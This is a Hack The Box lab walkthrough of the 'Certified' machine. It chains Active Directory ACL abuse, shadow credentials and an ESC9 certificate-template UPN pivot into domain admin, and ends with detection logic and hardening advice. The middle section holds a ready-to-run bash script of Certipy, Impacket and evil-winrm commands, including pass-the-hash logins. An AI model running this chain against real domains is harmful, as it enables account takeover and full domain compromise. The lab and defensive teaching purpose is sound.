This walkthrough covers the Certified box (Hack The Box) and focuses on an Active Directory privilege-escalation chain that starts from a low-privileged user and ends in full domain admin access.

Starting credentials were provided:

  • Username: judith.mader
  • Password: judith09

Recon and enumeration

Nmap and service enumeration identified a typical AD attack surface:

  • Kerberos, LDAP/LDAPS, SMB, RPC, WinRM
  • Domain controller host with AD CS present

From there I used:

  • ldapdomaindump for LDAP object visibility
  • bloodhound-python for graphing privilege paths
  • crackmapexec for SMB share and auth checks

Initial foothold and AD pathing

With judith.mader, the important finding from the BloodHound graph was a path built entirely on object control and group rights rather than on any credential weakness:

  1. judith.mader can take ownership of the Management group. Owning the object lets her rewrite its DACL and grant herself the right to add members.
  2. Add judith.mader to Management.
  3. Membership in Management in turn grants write access over the management_svc account, which is the leverage the next step abuses.

None of these steps needs a password for management_svc; control of the object is enough, which is why ACL misconfigurations deserve the same attention as leaked credentials.


Shadow credentials and service-account hash

Using Certipy's shadow-credentials mode against management_svc (which requires write access to the account's msDS-KeyCredentialLink attribute), I was able to:

  • Add a temporary key credential to management_svc
  • Authenticate as management_svc with PKINIT using the matching certificate
  • Retrieve the NT hash (the TGT's PAC carries the NT hash, which Certipy extracts)
  • Restore the original key credentials so the attribute looks untouched afterwards

Certipy's "shadow auto" performs all four steps in one run. This gave a reusable foothold in a more privileged service-account context without ever resetting a password, which would have been noisier and would have broken whatever the service account is used for.


AD CS abuse chain

As management_svc, I enumerated vulnerable certificate templates and found a misconfigured authentication template (CertifiedAuthentication) suitable for escalation.

High-level chain:

  1. Enumerate vulnerable templates (Certify.exe find /vuln from Windows, or certipy find -vulnerable from the attacker host).
  2. Abuse management_svc's rights over ca_operator to take control of that account (the same shadow-credentials technique yields its NT hash).
  3. Rewrite ca_operator's userPrincipalName to the target identity, request a certificate from CertifiedAuthentication as ca_operator, then put the UPN back. The issued certificate now names the target, not ca_operator.
  4. Authenticate with that certificate via PKINIT and recover the target's NT hash.
  5. Repeat toward administrator.

The key weakness was unsafe AD CS template/security configuration enabling an identity pivot through certificate issuance: the KDC maps the certificate to an account by UPN, so whoever can set a UPN on an account that may enroll in the template can mint a certificate for any user. This UPN-rewrite pattern is the one catalogued as ESC9.
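The three procedures above (group takeover, shadow credentials, UPN pivot through AD CS) as one script. This is an added example written for this page, not the author's own tooling. The domain name, DC address and CA name are not stated on the page and are placeholders here; everything else (judith.mader, Management, management_svc, ca_operator, CertifiedAuthentication) comes from the walkthrough. The script defaults to dry-run mode, which only prints each command so the sequence can be reviewed before anything touches a target.

```bash
#!/usr/bin/env bash
# Added example: the escalation chain from the Certified walkthrough as a script.
# Not the author's script. DOMAIN, DC_IP and CA_NAME are assumed placeholders and
# must be overridden; take the CA name from `certipy find` output.
set -eu

DOMAIN="${DOMAIN:-certified.htb}"        # assumed
DC_IP="${DC_IP:-10.10.11.41}"            # assumed placeholder
CA_NAME="${CA_NAME:-certified-DC01-CA}"  # assumed placeholder
TEMPLATE="CertifiedAuthentication"        # template named on the page
START_USER="judith.mader"; START_PASS="judith09"   # starting creds from the page
DRY_RUN="${DRY_RUN:-1}"                  # 1 = print commands only; DRY_RUN=0 executes them

# Print the command in dry-run mode, otherwise execute it as given.
run() { if [ "$DRY_RUN" = "1" ]; then printf '%s\n' "$*"; else "$@"; fi; }

# Step 1: take ownership of Management, grant ourselves WriteMembers, then join the group.
step_control_management() {
  run owneredit.py -action write -new-owner "$START_USER" -target Management \
      "$DOMAIN/$START_USER:$START_PASS" -dc-ip "$DC_IP"
  run dacledit.py -action write -rights WriteMembers -principal "$START_USER" \
      -target Management "$DOMAIN/$START_USER:$START_PASS" -dc-ip "$DC_IP"
  run net rpc group addmem Management "$START_USER" -U "$DOMAIN/$START_USER%$START_PASS" -S "$DC_IP"
}

# Step 2 (reused in step 3): shadow credentials. "shadow auto" adds a key credential,
# does PKINIT as the target, prints its NT hash and restores msDS-KeyCredentialLink.
#   $1 = acting account, $2 = its auth flags ("-p PASS" or "-hashes :NTHASH"), $3 = target account
step_shadow_creds() {
  # $2 is intentionally unquoted so that "-hashes :NTHASH" splits into two arguments.
  run certipy shadow auto -u "$1@$DOMAIN" $2 -account "$3" -dc-ip "$DC_IP"
}

# Step 3a: list templates the CA exposes as vulnerable (also reveals the CA name).
step_find_templates() {   # $1 = NT hash of management_svc
  run certipy find -u "management_svc@$DOMAIN" -hashes ":$1" -dc-ip "$DC_IP" -vulnerable -stdout
}

# Step 3b: the UPN pivot. ca_operator's UPN is pointed at the victim, a certificate is
# requested as ca_operator (so it carries the victim's UPN), the UPN is restored, and
# the certificate is used for PKINIT as the victim. Certipy names the pfx after the UPN.
#   $1 = NT hash of management_svc, $2 = NT hash of ca_operator, $3 = victim account
step_upn_pivot() {
  run certipy account update -u "management_svc@$DOMAIN" -hashes ":$1" \
      -user ca_operator -upn "$3" -dc-ip "$DC_IP"
  run certipy req -u "ca_operator@$DOMAIN" -hashes ":$2" -ca "$CA_NAME" \
      -template "$TEMPLATE" -dc-ip "$DC_IP"
  run certipy account update -u "management_svc@$DOMAIN" -hashes ":$1" \
      -user ca_operator -upn "ca_operator@$DOMAIN" -dc-ip "$DC_IP"
  run certipy auth -pfx "$3.pfx" -domain "$DOMAIN" -dc-ip "$DC_IP"
}

main() {
  step_control_management
  step_shadow_creds "$START_USER" "-p $START_PASS" management_svc      # prints management_svc NT hash
  MSVC_HASH="${MSVC_HASH:-<management_svc NT hash>}"                    # export it before a real run
  step_shadow_creds management_svc "-hashes :$MSVC_HASH" ca_operator   # prints ca_operator NT hash
  CAOP_HASH="${CAOP_HASH:-<ca_operator NT hash>}"
  step_find_templates "$MSVC_HASH"
  step_upn_pivot "$MSVC_HASH" "$CAOP_HASH" administrator               # prints administrator NT hash
  ADMIN_HASH="${ADMIN_HASH:-<administrator NT hash>}"
  run evil-winrm -i "$DC_IP" -u administrator -H "$ADMIN_HASH"
}
main
```

Each hash is produced by an interactive tool run, so in a real run the script is executed stage by stage with MSVC_HASH, CAOP_HASH and ADMIN_HASH exported between stages. The UPN restore in step_upn_pivot is not optional: leaving ca_operator with the victim's UPN breaks that account and is an obvious forensic artifact, whereas the issued certificate remains valid after the restore.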


Administrator access

After obtaining the administrator hash, I authenticated via WinRM:

evil-winrm -i <TARGET_IP> -u administrator -H <ADMIN_NT_HASH>

From there I retrieved root.txt and confirmed full compromise.


Key takeaways

  • AD object ownership and ACL misconfigurations can be as dangerous as plaintext creds: every hop in this chain was an object right, not a password.
  • AD CS template abuse remains one of the fastest domain escalation paths when templates are weak.
  • Service-account control plus certificate abuse creates compounding risk: each account taken over here unlocked the next.
  • Monitor and alert on:
    • ACL/owner changes on privileged groups and users (event 5136 with nTSecurityDescriptor or member as the modified attribute; this requires a SACL on the objects, i.e. "Audit Directory Service Changes" enabled and applied)
    • Key-credential (shadow-credential) anomalies (event 5136 on msDS-KeyCredentialLink, especially a write by a principal other than the account itself)
    • Suspicious certificate enrollment and use (CA events 4886/4887, and 4768 TGT requests whose certificate information names an account other than the one that enrolled)
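The three signals above, as an added detection example written for this page (not part of the original walkthrough) over a constructed, simplified event feed. The input format is an assumed one-event-per-line key=value export of the kind a SIEM or a wevtutil-to-CSV pipeline might produce; the field names follow the Windows events (5136 directory object modified, 4768 Kerberos TGT request with certificate information on PKINIT logons) and a CERT_ISSUED pseudo-event carrying the requester and serial number of each issued certificate as recorded in the CA database. The sample lines and the certified.htb DNs are constructed. Events are assumed to be in chronological order, since the PKINIT check needs the issuance record before the logon.

```bash
#!/usr/bin/env bash
# Added example: triage the ACL, shadow-credential and certificate signals from an
# exported event feed. The sample events below are constructed; the domain is assumed.
set -eu

# Objects whose owner/DACL/membership changes always warrant an alert (names from the page).
WATCH='^CN=(Management|management_svc|ca_operator|Administrator),'

# Read key=value events from stdin, print one ALERT line per suspicious event.
triage_events() {
  awk -v watch="$WATCH" '
    {
      split("", f)                                   # per-line field map
      for (i = 1; i <= NF; i++) {
        eq = index($i, "=")                          # split on the first "=" only;
        if (eq) f[substr($i, 1, eq - 1)] = substr($i, eq + 1)   # DNs contain "=" too
      }
    }
    # 5136 on a watched object: owner/DACL rewrite or membership change.
    f["EventID"] == "5136" && f["ObjectDN"] ~ watch &&
      (f["Attribute"] == "nTSecurityDescriptor" || f["Attribute"] == "member") {
      print "ALERT owner/ACL/membership change on " f["ObjectDN"] " (" f["Attribute"] ") by " f["Subject"]
    }
    # Any write to msDS-KeyCredentialLink is rare outside device enrollment.
    f["EventID"] == "5136" && f["Attribute"] == "msDS-KeyCredentialLink" {
      print "ALERT key-credential (shadow credential) write on " f["ObjectDN"] " by " f["Subject"]
    }
    # A UPN rewrite is the setup step for the certificate pivot.
    f["EventID"] == "5136" && f["Attribute"] == "userPrincipalName" {
      print "ALERT UPN rewritten on " f["ObjectDN"] " to " f["Value"] " by " f["Subject"]
    }
    # Remember who enrolled each serial, then flag PKINIT logons by someone else.
    f["EventID"] == "CERT_ISSUED" { issued[f["Serial"]] = f["Requester"] }
    f["EventID"] == "4768" && (f["CertSerialNumber"] in issued) &&
      tolower(issued[f["CertSerialNumber"]]) != tolower(f["TargetUserName"]) {
      print "ALERT certificate " f["CertSerialNumber"] " enrolled by " issued[f["CertSerialNumber"]] \
            " used for PKINIT as " f["TargetUserName"]
    }
  '
}

# Constructed sample: the walkthrough chain plus two benign events that must not alert.
SAMPLE_EVENTS='EventID=5136 Subject=judith.mader ObjectDN=CN=Management,CN=Users,DC=certified,DC=htb Attribute=nTSecurityDescriptor
EventID=5136 Subject=judith.mader ObjectDN=CN=Management,CN=Users,DC=certified,DC=htb Attribute=member Value=CN=judith.mader,CN=Users,DC=certified,DC=htb
EventID=5136 Subject=judith.mader ObjectDN=CN=management_svc,CN=Users,DC=certified,DC=htb Attribute=msDS-KeyCredentialLink
EventID=5136 Subject=management_svc ObjectDN=CN=ca_operator,CN=Users,DC=certified,DC=htb Attribute=msDS-KeyCredentialLink
EventID=5136 Subject=management_svc ObjectDN=CN=ca_operator,CN=Users,DC=certified,DC=htb Attribute=userPrincipalName Value=administrator
EventID=CERT_ISSUED Requester=ca_operator Serial=1a0000000c Template=CertifiedAuthentication
EventID=4768 TargetUserName=Administrator CertSerialNumber=1a0000000c
EventID=4768 TargetUserName=judith.mader CertSerialNumber=-
EventID=5136 Subject=helpdesk ObjectDN=CN=bob,CN=Users,DC=certified,DC=htb Attribute=description Value=updated'

# Run the triage over the constructed sample (six alerts expected, none for the last two lines).
triage_sample() { printf '%s\n' "$SAMPLE_EVENTS" | triage_events; }

triage_sample
```

The serial-number join is the check that catches the UPN pivot even when the template looks ordinary: the CA records the certificate as requested by ca_operator, while the KDC sees it presented for administrator. Serial formatting differs between the CA database and the 4768 event in practice, so normalize case and leading zeros before feeding real data through this join.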

Defensive recommendations

  • Audit and harden AD CS templates (EKUs, enrollment rights, subject and SAN controls, the no-security-extension flag) and make sure the CA enforces strong certificate mapping so a certificate is bound to the account's SID rather than to a rewritable UPN.
  • Restrict WriteOwner/WriteDACL/GenericAll/GenericWrite exposure on privileged objects, and review who can write userPrincipalName and msDS-KeyCredentialLink on accounts that may enroll for authentication certificates.
  • Enforce a tiered admin model and reduce standing privileges.
  • Add detections for Certipy-like behavior (key-credential writes followed by PKINIT from the same host) and for certificate authentication as an account other than the one that enrolled.
